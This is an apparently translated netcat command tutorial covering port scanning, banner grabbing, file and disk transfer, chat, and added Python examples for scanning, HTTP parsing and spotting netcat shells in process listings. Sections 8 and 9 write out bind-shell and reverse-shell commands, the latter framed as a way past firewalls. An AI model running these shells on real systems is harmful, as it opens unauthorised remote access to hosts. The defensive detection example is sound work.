PS: Ubuntu ships the netcat-openbsd version, which has no -c/-e parameters.
PSS: the online markdown editor has a bug; the "#" sign still shows in headings, and I don't know why.
## Parameters
Connect to a remote host: nc [-options] hostname port[s] [ports] ...
Listen on a port and wait for a connection: nc -l port [-options] [hostname] [port]
- -g<gateway>: set a source-routing hop gateway; up to 8 may be given;
- -G<num>: set the source-routing pointer; a multiple of 4;
- -h: online help;
- -i<seconds>: set the delay between lines sent and between ports scanned;
- -l: listen mode, wait for inbound connections;
- -n: use numeric IP addresses only, without DNS lookups;
- -o<file>: write a hex dump of the transmitted data to the named file;
- -p<port>: set the local source port used by this host;
- -r: choose source and destination ports at random;
- -s<address>: set the local IP address from which packets are sent;
- -u: use UDP instead of TCP;
- -v: verbose, show what the command is doing;
- -w<seconds>: set the time to wait for a connection;
- -z: zero-I/O mode, used only when scanning ports.
## Usage
[A: server (192.168.1.1); B: client (192.168.1.2)]
#### 0. Connect to a remote host
$ nc 192.168.x.x 80
Connects to TCP port 80 of 192.168.x.x.
To listen on the local host:
$ nc -l 80
Listens on TCP port 80 of this machine.
Timeout control:
Most of the time we do not want the connection to stay open forever, so we use the -w parameter to set an idle timeout: the value that follows it is a number of seconds, and the connection is closed once that time is exceeded.
Server
$ nc -l 2389
Client
$ nc -w 10 localhost 2389
The connection is closed after 10 seconds.
Note: do not combine -w with -l on the server side; -w has no effect there.
#### 1. Port scan
Port scanning is used by system administrators and attackers alike to discover which ports on a machine are open, which helps identify exposed services and their vulnerabilities.
$ nc -z -v -n 192.168.1.1 21-25
It can run in TCP or UDP mode; TCP is the default, and -u switches to UDP.
The -z parameter tells netcat to use zero-I/O mode: the connection is closed as soon as it succeeds, with no data exchanged.
The -v parameter asks for verbose output.
The -n parameter tells netcat not to do a reverse DNS lookup of the IP address.
The command above prints which of ports 21 to 25 are open.
$ nc -v 127.0.0.1 22
localhost [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4" is the banner. A banner is the text message a service sends you when you connect to it. Banner information is useful when you try to identify the type and version of a service and therefore its known vulnerabilities. Not every service sends a banner, though. Once you find an open port, you can grab its banner simply by connecting to the service with netcat.
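To show what `nc -z` and `nc -v` actually do on the wire, here is an added Python example (not code from the original page): it connects to each port with a timeout, treats a successful connect as "open", optionally reads the service greeting as `nc -v` does, and includes a constructed local listener that sends a made-up banner so the scan can be exercised offline. The host, ports and banner text are all assumptions for the demonstration.

```python
import socket
import threading


def start_banner_server(banner: bytes):
    """Constructed local stand-in for a real service: listens on 127.0.0.1 (port chosen
    by the OS), sends `banner` to every client, then closes. Returns (port, stop)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)             # lets the accept loop notice the stop flag
    port = srv.getsockname()[1]
    stop_flag = threading.Event()

    def serve():
        while not stop_flag.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass            # client already closed (the -z case)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop_flag.set


def find_closed_port():
    """Pick a port nothing listens on: bind to 0, read the number, release it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def probe_port(host, port, timeout=1.0, grab_banner=False):
    """What `nc -z` (connect, then close) or `nc -v` (read the greeting) does.
    Returns (is_open, banner_bytes)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if not grab_banner:
                return True, b""
            s.settimeout(timeout)
            try:
                return True, s.recv(256)
            except socket.timeout:
                return True, b""    # open, but the service waits for us to speak first
    except OSError:                 # refused, unreachable, or timed out
        return False, b""


def scan_ports(host, ports, timeout=1.0, grab_banner=False):
    """Return {port: banner_text} for every open port in `ports`
    (the equivalent of `nc -z -v -n host lo-hi`)."""
    found = {}
    for port in ports:
        is_open, banner = probe_port(host, port, timeout, grab_banner)
        if is_open:
            found[port] = banner.strip().decode("ascii", "replace")
    return found


if __name__ == "__main__":
    port, stop = start_banner_server(b"SSH-2.0-constructed-banner\r\n")
    print(scan_ports("127.0.0.1", range(port - 1, port + 2), grab_banner=True))
    stop()
```

Keep the timeout short when sweeping many ports: a filtered port (packets silently dropped) costs the full timeout, whereas a closed port is refused immediately.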
#### 2. Chat server
If you want to talk to your friends, there is plenty of chat software and services to choose from. But suppose you do not have that luxury, for example in a computer lab where all external connections are restricted: how do you chat all day with the friend sitting in the next room? Netcat lets you create a chat server on a port agreed in advance so that they can reach you.
Server
$ nc -l 20000
This netcat command starts a TCP server on port 20000; everything read from standard input is sent to that port and everything received is written to standard output, so both sides of the conversation appear in this shell.
Client
$ nc 192.168.1.1 20000
Whatever you type on machine B appears on machine A, and vice versa.
#### 3. File transfer
We often need to transfer files over the network. There are many ways to do it, such as FTP, SCP or SMB, but when you only need to transfer a file once or temporarily, it is not worth spending time installing and configuring software on your machine. Suppose you want to send a file file.txt from A to B. Either A or B can play the server.
Server
$ nc -l 20000 < file.txt
Client
$ nc 192.168.1.1 20000 > file.txt
Here we create the server on A and redirect netcat's input from file.txt; as soon as a connection is made to that port, netcat sends the file contents.
On the client we redirect the output to file.txt: when B connects to A, A sends the file contents and B saves them to file.txt.
The file source does not have to be the server; it works the other way round too. In the example below the server is created on B and receives the file, while A connects as the client and sends it: this time we redirect the output of netcat on the server and the input of netcat on the client.
B as server
Server
$ nc -l 20000 > file.txt
Client
$ nc 192.168.1.2 20000 < file.txt
#### 4. Directory transfer
Sending one file is simple, but if we want to send several files or a whole directory, it is just as simple: pack them with tar and send the archive.
To transfer a directory over the network from A to B:
Server
$ tar -cvf - dir_name | nc -l 20000
Client
$ nc 192.168.1.1 20000 | tar -xvf -
On the server A we create a tar archive, write it to standard output with -, and pipe it into netcat, which sends it over the network.
On the client we receive the archive through the netcat pipeline and unpack it.
If you want to save bandwidth, compress the archive with bzip2 or another tool before sending it:
Server
$ tar -cvf - dir_name | bzip2 -z | nc -l 20000
Compression via bzip2.
Client
$ nc -n 192.168.1.1 20000 | bzip2 -d | tar -xvf -
#### 5. Encrypt the data you send over the network
If you are concerned about the confidentiality of data sent over the Internet, you can encrypt it with a tool such as mcrypt before sending it.
Server
$ nc localhost 20000 | mcrypt --flush --bare -F -q -d -m ecb > file.txt
Decrypt the received data with mcrypt (-d).
Client
$ mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 20000
Encrypt the file with mcrypt before handing it to netcat.
Both commands prompt for a password; make sure the same password is used on both ends.
Here we use mcrypt, but any other encryption tool can be used in the same pipeline. Note that ECB mode (-m ecb) encrypts equal plaintext blocks to equal ciphertext blocks and so leaks patterns, and mcrypt adds no integrity check, so a modern tool with an authenticated mode is preferable.
#### 6. Streaming video
Although it is not the best way to stream video, if the server has no dedicated tools, netcat still gives us a chance to do it.
Server
$ cat video.avi | nc -l 20000
Here we simply read a video file and pipe its contents into netcat.
Client
$ nc 192.168.1.1 20000 | mplayer -vo x11 -cache 3000 -
Here we read the data from the socket and pipe it into MPlayer.
#### 7. Cloning a device
If you have installed a Linux machine and need the same setup on other machines, you do not have to repeat the installation and configuration: boot the other machine from some bootable disk and clone your machine onto it.
Cloning a Linux PC is simple. Assume your system is on the disk /dev/sda.
Server
$ dd if=/dev/sda | nc -l 20000
Client
$ nc 192.168.1.1 20000 | dd of=/dev/sda
dd reads the raw data from the disk; its output is sent through the netcat server to the other machine and written to its disk, so all the data is copied along with the partition table. If the target is already partitioned and only the root partition needs cloning, change sda to sda1, sda2 and so on, according to where the system root partition is.
#### 8. Open a shell
We have used remote shells with telnet and ssh, but if neither is installed and we lack permission to install them, we can also create a remote shell with netcat.
Suppose your netcat supports the -c/-e parameter (traditional netcat):
Server
$ nc -l 20000 -e /bin/bash -i
Client
$ nc 192.168.1.1 20000
Here we create a netcat server and tell it to execute /bin/bash once a connection succeeds.
If netcat does not support -c or -e (OpenBSD netcat), we can still create a remote shell:
Server
$ mkfifo /tmp/tmp_fifo
$ cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo
Here we create a FIFO file, then pipe the FIFO contents into the shell; 2>&1 merges standard error into standard output, which is piped into netcat listening on port 20000. Finally the output of netcat is redirected back into the FIFO.
Description:
- input received from the network is written to the FIFO file;
- the cat command reads the FIFO and sends its contents to the sh command;
- the sh process executes the input and writes the result back to netcat;
- netcat sends the output to the client over the network.
It works because the commands in a pipeline run in parallel. A FIFO is used instead of a regular file because reads on a FIFO block until data arrives; with a regular file, cat would hit end-of-file at once and exit.
On the client, simply connect to the server:
Client
$ nc 192.168.1.1 20000
You get a shell prompt on the client.
#### 9. Reverse shell
A reverse shell is a shell opened on the client side. It is called reverse because, unlike the usual setup, the server consumes a service provided by the client.
Server
$ nc -l 20000
On the client side, simply tell netcat to execute the shell once the connection is established:
Client
$ nc 192.168.1.1 20000 -e /bin/bash
So what is special about the reverse shell?
The reverse shell is often used to get around firewall rules such as blocking inbound connections. For example, my machine has the private address 192.168.1.1 and reaches the outside world through a proxy server. If I want a shell on this machine from an outside host such as 1.2.3.4, I would use a reverse shell for that purpose.
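The bind-shell, FIFO-shell and reverse-shell commands of sections 8 and 9 leave recognisable traces in a process listing, which is what a defender looks for. The following is an added Python example (not from the original page) that parses constructed `ps -eo pid,user,args` output and flags two patterns: netcat started with -e/-c, and an interactive `sh -i` owned by the same user as a running netcat (the FIFO trick). The sample rows, user names and PIDs are constructed for the demonstration.

```python
import re

# Constructed sample of `ps -eo pid,user,args` output (not real host data); the rows
# mirror the commands shown in sections 3, 8, 9 and 13 of the page.
SAMPLE_PS = """\
 1201 www-data nginx: worker process
 1340 alice    nc -l 20000 < file.txt
 1402 root     nc -l 20000 -e /bin/bash -i
 1455 bob      nc 192.168.1.1 20000 -e /bin/bash
 1460 dave     cat /tmp/tmp_fifo
 1461 dave     /bin/sh -i
 1462 dave     nc -l 20000
 1500 carol    nc -4 localhost 2389
"""

NC_RE = re.compile(r"^(?:\S*/)?(?:nc|ncat|netcat)\b")            # command is a netcat binary
NC_EXEC_RE = re.compile(r"\s-[ce]\s")                              # -e/-c: program bound to the socket
INTERACTIVE_SHELL_RE = re.compile(r"^(?:\S*/)?(?:ba|da)?sh -i$")   # shell forced interactive, no tty


def parse_ps(text):
    """Parse `pid user args` rows into dicts; skips a header line and malformed lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0].isdigit():
            rows.append({"pid": int(parts[0]), "user": parts[1], "args": parts[2]})
    return rows


def flag_suspicious(rows):
    """Return {pid: reason} for processes worth investigating.

    Rule 1: netcat invoked with -e/-c (bind or reverse shell, sections 8 and 9).
    Rule 2: an interactive shell (`sh -i`) and a netcat process owned by the same
            user, the footprint of the FIFO trick used when -e is unavailable.
    """
    hits = {}
    by_user = {}
    for row in rows:
        by_user.setdefault(row["user"], []).append(row)
        if NC_RE.match(row["args"]) and NC_EXEC_RE.search(row["args"]):
            hits[row["pid"]] = "netcat with -e/-c"
    for procs in by_user.values():
        has_nc = any(NC_RE.match(p["args"]) for p in procs)
        for p in procs:
            if has_nc and INTERACTIVE_SHELL_RE.match(p["args"]):
                hits[p["pid"]] = "interactive shell alongside netcat (FIFO pattern)"
    return hits


def scan_sample():
    """Run both rules over the constructed sample."""
    return flag_suspicious(parse_ps(SAMPLE_PS))


if __name__ == "__main__":
    for pid, reason in sorted(scan_sample().items()):
        print(pid, reason)
```

Plain file transfers and chat sessions (alice, carol) are not flagged, since netcat itself is a legitimate administration tool; the signal is the shell bound to the socket, so in production the same rules are better fed from process-creation audit events than from a one-off ps snapshot.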
#### 10. Specify the source port
Suppose your firewall filters all ports except port 25; you then need to specify the source port with the -p option.
Server
$ nc -l 20000
Client
$ nc 192.168.1.1 20000 -p 25
Using a port below 1024 requires root privileges.
This command makes the client use port 25 as its source port; otherwise a random port is used.
#### 11. Specify the source address
Suppose your machine has several addresses and you want to state explicitly which one outbound traffic should use. Netcat's -s option specifies the IP address.
Server
$ nc -u -l 20000 < file.txt
Client
$ nc -u 192.168.1.1 20000 -s 172.31.100.5 > file.txt
The command binds to the address 172.31.100.5.
#### 12. Static web page server
Create a new web page named somepage.html;
Create a new shell script:
while true; do nc -l 80 -q 1 < somepage.html; done
Run it as root, then open 127.0.0.1 in a browser to check that it works.
nc is mostly an administrator's tool for debugging and testing; if all you need is a temporary web server, Python's SimpleHTTPServer module is the easier choice.
#### 13. Simulating HTTP headers
$ nc www.huanxiangwu.com 80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser

HTTP/1.1 OK
Date: Tue, Dec 2008 07:23: GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=BBADORBVIE1GN037IIH6LRDG50; path=/
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: own_sid=xrutay, Expires=Tue, 23-Dec-2008 07:23:24 GMT; Path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[...]
After the nc command, type the request line and headers (GET through User-Agent) and press Enter twice; the server then answers with its HTTP headers.
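The exchange above is easier to reason about once you see the exact bytes: the request must use CRLF line endings and end with an empty line (the second Enter), and the response head ends the same way, after which a chunked body follows. The following added Python example (not from the original page) builds such a request, parses a response head while keeping repeated headers such as the two Set-Cookie and two Cache-Control lines, and decodes a chunked body. The sample response, its cookie values and date are constructed, not captured from any server.

```python
# Constructed sample response, modelled on the header set shown above; the cookie
# values, date and body are made up for the demonstration.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Tue, 23 Dec 2008 07:23:24 GMT\r\n"
    b"Server: Apache/2.2.6 (Unix)\r\n"
    b"Set-Cookie: PHPSESSID=constructed1; path=/\r\n"
    b"Cache-Control: no-store, no-cache, must-revalidate\r\n"
    b"Cache-Control: private, max-age=0\r\n"
    b"Set-Cookie: own_sid=constructed2; Path=/\r\n"
    b"Vary: Accept-Encoding\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"6\r\n<html>\r\n"
    b"7\r\n</html>\r\n"
    b"0\r\n\r\n"
)


def build_request(host, path="/", method="GET", headers=None):
    """Raw HTTP/1.1 request bytes, exactly what you type into `nc host 80`:
    request line, headers, and the empty line that terminates the head."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}",
             "User-Agent: my-browser", "Connection: close"]
    lines += [f"{k}: {v}" for k, v in (headers or {}).items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response_head(raw):
    """Split a raw response into status line, headers and body. Header names are
    lower-cased and values kept in a list, so repeated headers are not lost."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("response head not terminated by an empty line")
    lines = head.decode("iso-8859-1").split("\r\n")
    version, status, reason = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return {"version": version, "status": int(status), "reason": reason,
            "headers": headers, "body": body}


def decode_chunked(body):
    """Decode a Transfer-Encoding: chunked body: hex size line, data, CRLF,
    repeated until a zero-size chunk."""
    out = b""
    while True:
        size_line, _, rest = body.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return out
        out += rest[:size]
        body = rest[size + 2:]                      # skip the data and its CRLF


if __name__ == "__main__":
    print(build_request("ispconfig.org", headers={"Referer": "mypage.com"}).decode())
    parsed = parse_response_head(SAMPLE_RESPONSE)
    print(parsed["status"], parsed["headers"]["server"], decode_chunked(parsed["body"]))
```

The Server header is the HTTP equivalent of the SSH banner from section 1: it is what a manual `nc` request reveals about a web server's software and versions, which is why many sites trim it.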
#### 13. Netcat IPv6 support
Netcat's -4 and -6 parameters select the IP address family, IPv4 and IPv6 respectively:
Server
$ nc -4 -l 2389
Client
$ nc -4 localhost 2389
Then we can use the netstat command to look at the connection:
$ netstat | grep 2389
tcp 0 0 localhost:2389 localhost:50851 ESTABLISHED
tcp 0 0 localhost:50851 localhost:2389 ESTABLISHED
Next, IPv6:
Server
$ nc -6 -l 2389
Client
$ nc -6 localhost 2389
Run netstat again:
$ netstat | grep 2389
tcp6 0 0 localhost:2389 localhost:33234 ESTABLISHED
tcp6 0 0 localhost:33234 localhost:2389 ESTABLISHED
The prefix is now tcp6, which shows that the address used is IPv6.
#### 14. Stop netcat reading from standard input
This uses the -d parameter; see the following example:
Server
$ nc -l 2389
Client
$ nc -d localhost 2389
Hi
The text Hi that you typed is not sent to the server.
#### 15. Force the netcat server to keep running
Normally, when the client connected to the server disconnects, the server exits too.
Server
$ nc -l 2389
Client
$ nc localhost 2389
^C
Server
$ nc -l 2389
$
In the example above, the server exits as soon as the client disconnects.
We can use the -k parameter so that the server does not exit when a client disconnects.
Server
$ nc -k -l 2389
Client
$ nc localhost 2389
^C
Server
$ nc -k -l 2389
This time the server keeps listening after the client disconnects.
#### 16. Make the netcat client wait before exiting on EOF
The netcat client's -q parameter controls how many seconds it waits after receiving EOF before exiting:
Client
$ nc -q 5 localhost 2389
Now, when the client receives EOF, it waits 5 seconds before exiting.
#### 17. Sending mail by hand over SMTP
When testing a mail server, you can send a message this way (SMTP_SERVER stands for the mail server's host name):
$ nc SMTP_SERVER 25 << EOF
HELO host.example.com
MAIL FROM: <user@host.example.com>
RCPT TO: <user2@host.example.com>
DATA
Body of email.
.
QUIT
EOF
#### 18. Via a proxy server
This command connects to port 42 of host.example.com through the proxy server 10.2.3.4:8080:
$ nc -x10.2.3.4:8080 -Xconnect host.example.com 42
#### 19. Using Unix domain sockets
This command creates a Unix domain socket and receives data on it:
$ nc -lU /var/tmp/dsocket
Linux NC Command Usage Collection